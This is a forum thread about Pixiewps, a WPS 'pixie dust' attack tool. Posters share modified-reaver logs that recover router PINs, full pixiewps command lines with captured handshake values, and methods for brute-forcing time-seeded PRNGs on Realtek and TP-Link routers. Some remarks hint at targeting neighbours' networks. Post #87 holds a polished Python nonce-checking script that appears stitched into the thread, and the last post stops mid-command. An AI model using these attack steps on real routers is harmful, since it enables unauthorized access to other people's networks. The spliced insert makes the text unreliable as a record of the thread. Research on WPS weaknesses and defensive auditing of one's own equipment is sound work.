
Thread: Pixiewps: wps pixie dust attack tool

  1. #51
    I'm interested in your modified reaver version. Does it also test the pin to get the actual passphrase as well?

    Quote Originally Posted by t6_x View Post
    Finally able to create my account in this forum.

    I already emailed wiire about the tests I've done.

    First of all, I made a modified version of reaver to facilitate the tests; this modification already does a pixie test when a pin is tested in reaver.

    [P] E-Nonce: 41:f2:8c:82:53:3b:df:........
    [P] PKE: 6b:0e:22:cb:cd:21:........
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [+] Received message M1
    [P] AuthKey: f7:fb:bc:21:ab:3b:99:70:36:8e:f1:a0:........
    [+] Sending message M2
    [P] E-Hash1: 1e:d6:12:27:8f:12:28:21:9a:54:.........
    [P] E-Hash2: d:f:34:e:ac:55:a4:9e:b3:95:31:7a:61:b0:........
    [Pixie-Dust]
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] PSK1: 76:46:96:c7:5d:e4:8a:86:.......
    [Pixie-Dust][*] PSK2: 1b:5e:3e:6b:19:89:4b:5c:.......
    [Pixie-Dust] [+] WPS pin: 41368541
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    [+] Received message M3
    [+] Sending message M4

    If someone wants this version, tell me.



    Now, regarding the TP-Link.

    I believe it may be vulnerable to another type of problem.

    I have a TP-Link 740N v1; it is a very old router, I think from 2004-2005.


    It has the Atheros chipset, runs Linux and uses hostap together with /dev/random.

    But this firmware version, for example, has a problem in the generation of random numbers; it may be that this firmware version has this problem.

    The seed for generating the random number is based on the router's date (date, time, seconds).

    Every time I restart the modem, the seed used to generate the random number is the same. So it is possible to bruteforce all dates, hours and seconds to find the current state of the seed. This makes it possible to generate future seeds and bruteforce the pin.


    It may be that this problem is only in this firmware version; I do not have other routers to test or compare, and without having them in hand it is difficult to run the tests.

    But this problem is certainly present in many other router models.


    Today I came across a router where E-Hash1 and E-Hash2 were identical, and I needed to make a modification in pixie for it to do the bruteforce correctly.

    I will continue developing and will come back to post when I have more news.

    Sorry for the English, I used a translator.

  2. #52
    Pixiewps 1.0.5 is out!

    Added a partial implementation of a new attack!

    Vulnerable devices: Realtek (ES-1 = ES-2 = Enrollee nonce). This attack doesn't always work. Also be sure not to use --dh-small with this one! Get the PKR from Wireshark and supply the Enrollee Nonce. Test and report!

    Thanks to Dominique Bongard (again) and also to soxrok2212.

    Bongard tweet: https://twitter.com/Reversity/status/586610963354357762
    Rand function to implement: https://github.com/skristiansson/uCl...lib/random_r.c

  3. #53
    I do not have a much larger practical interest in this attack vector other than as a POC, and probably won't spend a ton of time testing it out or using it. But this is still some really nice work! Kudos.

  4. #54
    Last edited by t6_x; 2015-04-13 at 23:23.

  5. #55
    Quote Originally Posted by t6_x View Post
    Now, regarding the TP-Link.

    I believe it may be vulnerable to another type of problem.

    I have a TP-Link 740N v1; it is a very old router, I think from 2004-2005.


    It has the Atheros chipset, runs Linux and uses hostap together with /dev/random.

    But this firmware version, for example, has a problem in the generation of random numbers; it may be that this firmware version has this problem.

    The seed for generating the random number is based on the router's date (date, time, seconds).

    Every time I restart the modem, the seed used to generate the random number is the same. So it is possible to bruteforce all dates, hours and seconds to find the current state of the seed. This makes it possible to generate future seeds and bruteforce the pin.


    It may be that this problem is only in this firmware version; I do not have other routers to test or compare, and without having them in hand it is difficult to run the tests.

    But this problem is certainly present in many other router models.


    Today I came across a router where E-Hash1 and E-Hash2 were identical, and I needed to make a modification in pixie for it to do the bruteforce correctly.

    I will continue developing and will come back to post when I have more news.
    If you can make this brute-force attack work on the TP-Link 740N in the future, it will be awesome, because 95% of networks around me are TP-Link 740N with WPS turned on.

  6. #56
    Quote Originally Posted by t6_x View Post
    Today I came across a router where E-Hash1 and E-Hash2 were identical, and I needed to make a modification in pixie for it to do the bruteforce correctly.
    Someone I am working with has also found an AP where E-Hash1 = E-Hash2. I speak a little Spanish and the other guy speaks it fluently... I guess you do too? Anyways, if you could e-mail me that would be great. My e-mail is my user name @gmail.com

    Thanks!

  7. #57
    Quote Originally Posted by WaLkZ View Post
    If you can make this brute-force attack work on the TP-Link 740N in the future, it will be awesome, because 95% of networks around me are TP-Link 740N with WPS turned on.
    I have the same problem!
    http://www44.zippyshare.com/v/aEY5Jq61/file.html

  8. #58
    Quote Originally Posted by kcdtv View Post
    TP-Link is an Atheros addict, but 4 models of TP-Link AP have at least one version with a Ralink chipset, and these ones may probably be affected. (One was reported as such, but we never got the data.)
    Vendor: TP-LINK
    Model: TD-W8951ND
    Firmware: 3.0.1 Build 110720 Rel.40612
    Chipset: Ralink (RT2860)

    Confirmed vulnerable.

  9. #59
    I have a TP-LINK TD-W8961ND with the same Ralink (RT2860) chipset, but when I tried Reaver to get the info it always gets stuck at M2. Is there a solution, please?

  10. #60
    Quote Originally Posted by wiire View Post
    Vendor: TP-LINK
    Model: TD-W8951ND
    Firmware: 3.0.1 Build 110720 Rel.40612
    Chipset: Ralink (RT2860)

    Confirmed vulnerable.
    I have tested the following routers with this result: "WPS pin not found!"

    1. WPS Manufacturer: D-Link
    WPS Model Number: DIR-615

    2. WPS Manufacturer: ASUSTeK Computer Inc.
    WPS Model Number: RT-N12

    3. WPS Manufacturer: TP-LINK
    WPS Model Number: 1.0

  11. #61
    Quote Originally Posted by Jynn View Post
    I have tested the following routers with this result: "WPS pin not found!"

    1. WPS Manufacturer: D-Link
    WPS Model Number: DIR-615

    2. WPS Manufacturer: ASUSTeK Computer Inc.
    WPS Model Number: RT-N12

    3. WPS Manufacturer: TP-LINK
    WPS Model Number: 1.0
    Also D-Link DIR-501

  12. #62
    Pixie is not installing.
    It says:
    gcc -o pixiewps pixiewps.c -lssl -lcrypto -Wall -Werror
    pixiewps.c:46:26: fatal error: openssl/hmac.h: No such file or directory
    compilation terminated.
    make: *** [all] Error 1
    Even libssl-dev isn't installing. It's searching for 1.0.1e-2+deb7u12 but the repository has 1.0.1e-2+deb7u16.
    What to do?

  13. #63
    Quote Originally Posted by Frost.Elrick View Post
    Pixie is not installing.
    It says:
    gcc -o pixiewps pixiewps.c -lssl -lcrypto -Wall -Werror
    pixiewps.c:46:26: fatal error: openssl/hmac.h: No such file or directory
    compilation terminated.
    make: *** [all] Error 1
    Even libssl-dev isn't installing. It's searching for 1.0.1e-2+deb7u12 but the repository has 1.0.1e-2+deb7u16.
    What to do?
    Try this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto

  14. #64
    The position of the reaver wpc files when using these modded reaver programs is now:

    /usr/local/etc/reaver/

    File names are the 12-digit MAC address (no colons) of the target followed by .wpc

    Any unfinished work previously done with the stock version must be copied or moved from the /etc/reaver/ folder to the /usr/local/etc/reaver/ folder. To confirm file position use the following command in the terminal window.

    locate "*.wpc"

    MTeams
    Last edited by mmusket33; 2015-04-27 at 03:31.

  15. #65
    This thing is wicked, thank you so much. It makes wifi testing so much quicker, but I'll forget all the commands. Oh well, who needs typing when you have a script.

  16. #66
    With this it always gives me "pin not found"!!!

    Is there any solution?

  17. #67

    Still No Help

    Quote Originally Posted by slim76 View Post
    Try this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto
    It also gives the same error.
    libssl-dev isn't installing; maybe it is causing the problem, but I cannot get it even after apt-get update.

  18. #68
    To: FrostElrick

    Try this:

    Copy the following data between the #### to a text file with leafpad in root and name the file sources.list

    ################

    #placed in /etc/apt/ folder
    deb http://http.kali.org/kali kali main contrib non-free
    deb-src http://http.kali.org/kali kali main contrib non-free
    deb http://security.kali.org/kali-security kali/updates main contrib non-free
    deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
    deb http://http.kali.org /kali main contrib non-free
    deb http://http.kali.org /wheezy main contrib non-free

    ################
    Go to the /etc/apt folder and rename the existing sources.list file to sources.list.orig

    ie sources.list.original

    Now copy the sources.list file in root to the /etc/apt folder


    Get an internet connection, open a terminal window and run:


    sudo apt-get install libssl-dev
    sudo apt-get install libpcap-dev
    sudo apt-get install libsqlite3-dev


    Now install your modded reaver and pixiewps


    Now go to your /etc/apt folder and erase your sources.list then rename sources.list.orig back to sources.list

    Musket Teams
    Last edited by mmusket33; 2015-04-28 at 00:49.

  19. #69
    You could try using FrankenScript to download it and set it up, you can then browse the setup output in the frankenscript window by scrolling back.
    If you still get an error then I'd guess your kali installation is broken in some way.

  20. #70
    Pixiewps 1.1 is out!

    Download: GitHub

    What's new:
    - The previous attack now is fully implemented
    - AuthKey computation if --dh-small is specified (also in Reaver). The data can be gathered from a .cap file (manually)
    - Better input parsing with parameters length check
    - More user friendly. Added some examples of use in the usage screen.

    NOTE:
    - In this version the computer/machine time you're running pixiewps on is IMPORTANT. Be sure it's set to the right date and time
    - Although pixiewps can now be run without a modded version of Reaver (using --dh-small), the modded version made by t6_x and datahead is still recommended

    The (almost) full bruteforce for the new attack is performed using the option -f (--force). I say almost because it starts bruteforcing around the current machine time and goes backwards.

    What is not implemented yet but may come in (a not near) future (so don't ask ):
    - Multithreading (I tried to do a 'quick and dirty' implementation but it did more harm than good)
    - Read all data needed from a .cap (always with --dh-small)

    Below is an example of AuthKey computation:

    Last edited by wiire; 2015-05-01 at 19:43. Reason: Fixed some typos

  21. #71
    @wiire, as always, SUPER thanks!!

  22. #72
    Thanks for the new update, but it starts to get confusing with all these arguments now. Can we get a small tutorial?

  23. #73
    Can't wait to try this new version. I will report back soon.

  24. #74
    Last edited by Extradry; 2015-05-02 at 01:30.

  25. #75
    So... this works for Atheros now?

  26. #76
    What a beautiful Saturday midday!
    Sun is shining, day off and this magnificent version 1.1 is out!
    Great job wiire!
    So I can confirm that all devices from the rtl819x projects are vulnerable if their firmware is based on the Realtek SDK (but why wouldn't it be based on the tool designed and provided by Realtek to create them?)

    To make it a little hard for pixiewps and to really fully try this new -f option (brute force on the seed going backwards in time), I reset my Realtek device to factory default (first build time in 2012).
    On a cheap laptop with a poor microprocessor (around 600 keys/sec with aircrack-ng).


    Quote Originally Posted by wn722
    So... this works for Atheros now?

    You should read back wiire's posts in this thread.

    Quote Originally Posted by Desuu
    Thanks for the new update, but it starts to get confusing with all these arguments now. Can we get a small tutorial?
    That's just three more arguments (I think).
    Basically, if your router has a Realtek chipset and you don't get the PIN using pixiewps 1.0 (or using pixiewps 1.1 without the new features), it will work with the new pixiewps 1.1 using the -f argument.
    Notice the possibility to compute the AuthKey from a *.cap file, which allows you to make a full "offline attack" just by grabbing the required strings from your M packets (the small DH key option, -S, has to be used with reaver and pixiedust).
    Last edited by kcdtv; 2015-05-02 at 10:44.

  27. #77
    @kcdtv
    You should try using -v 3. It prints the seed (Unix datetime) as a human-readable date and time.

    Also I've been told there are routers that, after failing to retrieve the right date and time from the Internet, reset it to 0 (1st January 1970).

    Any problems compiling on Ubuntu at all?

    @wn722
    I'm afraid that Atheros and Marvell will remain unbreakable.

    As a side note, Atheros hired Jouni Malinen, the creator of hostapd, in 2008, and in 2011 was bought by Marvell. I read it on Wikipedia.

  28. #78
    No problems at all in Ubuntu & Xubuntu
    You should try using -v 3. It prints the seed (Unix datetime) as a human-readable date and time.
    Sweet!
    Also I've been told there are routers that, after failing to retrieve the right date and time from the Internet, reset it to 0 (1st January 1970).
    lol
    I can tell you that is not the case with rtl8192x-based routers (I have an Alfa AIP-W525H and a Totolink NR301RT) that I have been using for years... the farthest they go back to is the last build... both of mine are from 2012, and checking, I think (but I may be wrong) that we shouldn't have to go further back than the date that appears in the WPS probes: EV-2010-09-20, as I have the same for both routers, which are from different months; it seems to be a generic base date/time...

    As a side note Atheros hired Jouni Malinen the creator of hostapd in 2008 and in 2011
    These guys from Atheros know who they hire! For sure we won't get ES-1=ES-2=0 with somebody like this behind the code XD

  29. #79
    Quote Originally Posted by Desuu View Post
    Thanks for the new update, but it starts to get confusing with all these arguments now can we get a small tutorial ?
    I think soxrok is going to upload a new tutorial. There are some examples at the bottom of the usage screen. But basically what you normally want to do is launch pixiewps without --force. Then, if the pin is not found and pixiewps prints a warning saying that the router might be vulnerable, you may wanna try with --force. What pixiewps does is use the current time and date as a reference and go backwards trying to recover the seed, because the router's time and date might not be right (like set to factory time).

    Also I set the default verbosity level to 2 but you may probably want to set it to 3.

  30. #80
    Quote Originally Posted by wiire View Post
    Yes sorry I should've clarified. The --force option is used only for what I call mode 4 which is Realtek 's PRNG seed bruteforce. I was planning on adding modes selection but I didn't and I left those modes on the usage screen and I didn't want to explicitly refer to vendors in the program.

    The best practice is to run the program without -f, and if you get a warning saying that the router might be vulnerable to mode 4, it means that you may want to try again with -f or with another set of data that could lead you to (mode 2) secret nonces = enrollee nonce. I also refer to modes because that's how the program runs internally: it tries for every possible vulnerability. When it bruteforces the new PRNG though (that is mode 4), it normally tests a small window of time (approximately 10 days) because the new bruteforce consumes more power.

    So --force is basically used only if the router has set its time to the past (more than 10 days ago). To exhaust it probably takes 20 - 30 mins. Also -f doesn't take any argument. The program just doesn't complain if you pass it some extra arguments. I gotta fix that.

    Also would you mind replying on the pixiewps thread for program related questions? Thanks.

    Thank you very much for clarifying, Wiire.

  31. #81
    Hello, @Wiire @Kcdtv


    Chipset: Realtek RTL8671

    Computer: test computer, 1.9 GHz processor, 1 GB RAM (800 keys/sec)

    Command: pixiewps -e -r -s -z -a -n -f

    I've been waiting for 3 hours and Pixiewps is continuing...

    What can I do? Suggestions?

    a) Give up

    b) Continue, no risk no fun


  32. #82
    We have more or less the same power (I said 600 but it can go to 800 when it goes full power), and to go back until 2012 it took more than 15 minutes...
    But wiire has been told that some Realtek chipsets could go back until 1970,
    so if you can leave it, that would be great.
    This chipset could be the one... it is not from the X project series, so it has a good chance.
    Thinking about pixiewps, maybe it would be a good idea to have just one try with seed 1970 at the beginning of the brute force and then start the brute force backwards.
    I was also thinking about an option that allows you to define a point in time.
    Let's say I choose 01-01-2012 00:00
    Then the brute force would start from the defined time to today's time, and if the PIN is not found it would go from 01-01-2012 00:01 to 1970 (like two sequences).
    That may be a bit weird and strange, but I thought it may be interesting.
    Cheers

  33. #83
    Quote Originally Posted by Saydamination View Post
    Hello, @Wiire @Kcdtv


    Chipset: Realtek RTL8671

    Computer: test computer, 1.9 GHz processor, 1 GB RAM (800 keys/sec)

    Command: pixiewps -e -r -s -z -a -n -f

    I've been waiting for 3 hours and Pixiewps is continuing...

    What can I do? Suggestions?

    a) Give up

    b) Continue, no risk no fun

    3 hours...?

    I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.

  34. #84
    Quote Originally Posted by kcdtv View Post
    We have more or less the same power (I said 600 but it can go to 800 when it goes full power), and to go back until 2012 it took more than 15 minutes...
    But wiire has been told that some Realtek chipsets could go back until 1970,
    so if you can leave it, that would be great.
    This chipset could be the one... it is not from the X project series, so it has a good chance.
    Thinking about pixiewps, maybe it would be a good idea to have just one try with seed 1970 at the beginning of the brute force and then start the brute force backwards.
    I was also thinking about an option that allows you to define a point in time.
    Let's say I choose 01-01-2012 00:00
    Then the brute force would start from the defined time to today's time, and if the PIN is not found it would go from 01-01-2012 00:01 to 1970 (like two sequences).
    That may be a bit weird and strange, but I thought it may be interesting.
    Cheers
    Yes, now that pixiewps 1.1 is out we can collect data and decide how to optimize it best in a future release. As I said, I run it on my desktop PC, which takes only 20 minutes to exhaust the keyspace, so... yeah...

    If some of you get:

    "[!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data."

    but it doesn't find the pin after the --force bruteforce (and your computer time is OK), let me know. I assumed that the router cannot have its time set to the future, but... you never know...

  35. #85
    Hello @Kcdtv and Wiire,

    Many thanks for the comment and suggestion... you're absolutely right... Your idea about the option is great.

    I'm really wondering what would happen... So I want to wait until the test ends.

    I will come back with the test results.

    Cheers.
    Last edited by Saydamination; 2015-05-02 at 15:42. Reason: Add Ok..

  36. #86
    Quote Originally Posted by wiire View Post
    3 hours...?

    I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.
    Hello Wiire,

    Test finished... I'm not lucky.

    Reaver Results:

    Code:
    Associated with 90:F6:52:xX:xX:BX (ESSID: x)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Name: RTL8671
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: ec:c4:f2:77:36:3c:fe:00:60:13:b8:2d:bc:ba:68:82
    [P] PKR: d7:16:e1:10:56:09:4f:97:da:f3:85:7e:72:61:b5:53:4e:e9:f0:80:85:06:7f:48:03:6b:69:07:60:aa:5d:ea:e4:48:3d:ba:47:2d:38:8e:f6:d9:b0:13:3a:c4:52:af:90:ef:10:cd:e0:15:84:5b:d7:38:f7:37:cc:2b:56:81:05:7a:d8:d2:6d:2e:8e:fb:d9:bb:05:7b:6e:c9:72:1f:f3:46:45:83:3f:f3:80:fc:bb:b1:c0:e4:25:01:17:25:06:0b:cf:2e:8b:8b:2a:d1:7f:fd:f9:a6:b4:b8:f4:aa:6b:09:78:24:4c:dd:31:20:ca:66:2f:ee:81:ff:4e:1b:e8:cf:a6:83:67:59:f3:d3:04:63:07:05:bd:2e:85:06:13:7e:60:83:a9:95:96:17:46:a4:e3:d3:6e:c6:8c:9f:bd:73:6c:cb:84:65:cd:b7:b2:40:4f:be:61:7f:5c:a7:d7:53:d9:19:31:59:66:19:69:0b:67:f3:9e:04:88:73
    [P] AuthKey: ed:55:d2:0e:e3:f4:93:89:ab:80:b0:71:21:3f:1b:6f:2c:db:1a:8e:43:ad:f7:da:d2:e2:9f:ba:fe:81:e6:8a
    [+] Sending M2 message
    [P] E-Hash1: 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c
    [P] E-Hash2: f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18:e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be
    [Pixie-Dust]  
    [Pixie-Dust]   Pixiewps 1.1
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 13 s
    [Pixie-Dust]  
    [Pixie-Dust]   [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]
    Pixiewps Results:

    Code:
    pixiewps -f -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r d7:16:e1:10:56:09:4f:97:da:f3:85:7e:72:61:b5:53:4e:e9:f0:80:85:06:7f:48:03:6b:69:07:60:aa:5d:ea:e4:48:3d:ba:47:2d:38:8e:f6:d9:b0:13:3a:c4:52:af:90:ef:10:cd:e0:15:84:5b:d7:38:f7:37:cc:2b:56:81:05:7a:d8:d2:6d:2e:8e:fb:d9:bb:05:7b:6e:c9:72:1f:f3:46:45:83:3f:f3:80:fc:bb:b1:c0:e4:25:01:17:25:06:0b:cf:2e:8b:8b:2a:d1:7f:fd:f9:a6:b4:b8:f4:aa:6b:09:78:24:4c:dd:31:20:ca:66:2f:ee:81:ff:4e:1b:e8:cf:a6:83:67:59:f3:d3:04:63:07:05:bd:2e:85:06:13:7e:60:83:a9:95:96:17:46:a4:e3:d3:6e:c6:8c:9f:bd:73:6c:cb:84:65:cd:b7:b2:40:4f:be:61:7f:5c:a7:d7:53:d9:19:31:59:66:19:69:0b:67:f3:9e:04:88:73 -s 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c -z f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18:e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be -a ed:55:d2:0e:e3:f4:93:89:ab:80:b0:71:21:3f:1b:6f:2c:db:1a:8e:43:ad:f7:da:d2:e2:9f:ba:fe:81:e6:8a -n 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
    
     Pixiewps 1.1
    
     [-] WPS pin not found!
    [*] Time taken: 27220 s
    Pin:12345670
    Last edited by Saydamination; 2015-05-16 at 21:08. Reason: Add pin

  37. #87
    Quote Originally Posted by Saydamination View Post
    Hello Wiire,

    Test Finished ... I m not lucky..

    Code:
    [P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
    There's something utterly strange in that nonce. Try to capture a session with Wireshark and see if it matches the nonce reaver prints you.
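    A sanity check for the values reaver and pixiewps print, written as an added example for this thread (it is not pixiewps or reaver code): it parses the "[P] ..." and "[Pixie-Dust][*] ..." lines and flags the symptoms discussed here, ES-1 = ES-2 = 0, E-Hash1 equal to E-Hash2, ES equal to the E-Nonce, and an E-Nonce with fixed zero bytes like the one quoted above, so the owner of an AP can tell from one captured exchange whether its WPS nonces look predictable. The sample logs are constructed, modelled on the output format posted in this thread.

```python
import re

# Matches the "[P] Name: aa:bb:..." lines reaver prints and the
# "[Pixie-Dust][*] ES-1: aa: bb: ..." lines pixiewps prints (both appear in
# this thread, sometimes with a space after each colon).
PARAM_RE = re.compile(
    r"(?:\[P\]|\[Pixie-Dust\]\[\*\])\s*([A-Za-z0-9-]+):\s*"
    r"([0-9a-fA-F]{2}(?:[: ]+[0-9a-fA-F]{2})*)"
)


def parse_params(log_text):
    """Return {name: bytes} for every hex-valued parameter line in the log."""
    params = {}
    for m in PARAM_RE.finditer(log_text):
        name, hexstr = m.group(1), m.group(2)
        params[name] = bytes.fromhex(re.sub(r"[: ]", "", hexstr))
    return params


def fixed_zero_offsets(value, word=4):
    """Offsets that are zero in every `word`-byte group of `value`.

    A 128-bit nonce assembled from four 32-bit PRNG outputs whose high 16 bits
    are always zero yields {0, 1}; 16 genuinely random bytes yield an empty set.
    """
    if not value or len(value) % word:
        return set()
    groups = [value[i:i + word] for i in range(0, len(value), word)]
    return {j for j in range(word) if all(g[j] == 0 for g in groups)}


def check_wps_params(params):
    """Return a list of (code, message) findings about weak-looking WPS values."""
    findings = []
    nonce = params.get("E-Nonce")
    if nonce is not None:
        if not any(nonce):
            findings.append(("nonce-zero", "E-Nonce is all zero"))
        else:
            offs = fixed_zero_offsets(nonce)
            if offs:
                findings.append(("nonce-pattern",
                                 "E-Nonce has zero bytes at offsets %s of every "
                                 "32-bit word: it does not look like 128 random bits"
                                 % sorted(offs)))
    es1, es2 = params.get("ES-1"), params.get("ES-2")
    for name, es in (("ES-1", es1), ("ES-2", es2)):
        if es is None:
            continue
        if not any(es):
            findings.append(("es-zero", name + " is all zero (the Ralink case in this thread)"))
        elif nonce is not None and es == nonce:
            findings.append(("es-equals-nonce", name + " equals E-Nonce (the Realtek case in this thread)"))
    if es1 is not None and es1 == es2 and any(es1) and es1 != nonce:
        findings.append(("es-equal", "ES-1 equals ES-2: the secret nonces are not independent"))
    h1, h2 = params.get("E-Hash1"), params.get("E-Hash2")
    if h1 is not None and h1 == h2:
        findings.append(("hash-equal",
                         "E-Hash1 equals E-Hash2: should never happen with distinct "
                         "E-S1/E-S2 and PSK1/PSK2, the enrollee's WPS code is broken"))
    return findings


def audit(log_text):
    """Parse a log and return just the finding codes, in order."""
    return [code for code, _ in check_wps_params(parse_params(log_text))]


# Constructed sample in reaver/pixiewps output format, combining the symptoms
# reported in this thread: a structured E-Nonce, zero ES-1/ES-2, equal hashes.
WEAK_LOG = """\
[+] Received identity request
[P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
[P] WPS Manufacturer: Example Corp.
[+] Received M1 message
[P] R-Nonce: ec:c4:f2:77:36:3c:fe:00:60:13:b8:2d:bc:ba:68:82
[+] Sending M2 message
[P] E-Hash1: 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c
[P] E-Hash2: 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c
[Pixie-Dust][*] ES-1: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
[Pixie-Dust][*] ES-2: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
"""

# Constructed sample for an AP whose values look properly random.
HEALTHY_LOG = """\
[P] E-Nonce: d5:06:2e:f0:0b:f1:39:03:f3:e5:df:fe:c1:9f:cc:fb
[P] E-Hash1: 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c
[P] E-Hash2: f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18:e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be
"""

if __name__ == "__main__":
    for label, log in (("weak", WEAK_LOG), ("healthy", HEALTHY_LOG)):
        print(label + ":")
        for code, msg in check_wps_params(parse_params(log)):
            print("  [%s] %s" % (code, msg))
```

    Feed it the "[P]" lines from a reaver session against your own AP; an empty result does not prove the nonces are random, but any finding means the AP should have WPS disabled or its firmware updated.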

  38. #88
    You are right, Wiire. This router is different. I think there is some protection.

    I will try other options...

    This is Wireshark screen:

    http://imgur.com/IkpSn7C

  39. #89
    Code:
    root@bt:~# pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 8c:da:44:e4:bf:e5:e4:a5:72:1e:c2:8e:8e:a4:c9:1f:28:16:95:f3:b8:fd:2c:9a:ad:5d:27:51:38:25:5d:cf:1f:25:35:65:99:f5:a3:1f:bc:c2:ff:59:45:3f:8d:a6:9a:72:c6:9d:1c:de:c9:2f:5e:e4:4f:f4:7a:7c:53:50:c7:da:d4:50:37:b5:a0:1d:bb:8c:a5:35:fc:b5:cd:2b:22:3b:5e:2e:23:51:10:bc:8e:7e:c3:bd:65:3d:35:dd:5c:c6:83:ef:69:0d:6d:e7:d7:b2:e1:98:c7:53:0b:50:ce:3a:dd:66:42:6b:0f:34:50:13:f1:71:0e:3c:f1:ab:a6:0d:23:22:08:f5:b1:7c:b2:dd:c5:b6:91:c6:fe:d6:ca:fe:e0:7b:ed:22:90:3c:06:d3:9c:ae:b7:77:79:ca:2a:cc:42:ac:3f:07:0b:73:69:31:7c:f9:69:ea:24:69:d1:4e:f3:b1:cf:bb:22:76:60:3f:11:8a:91:46:ba:a7 -s 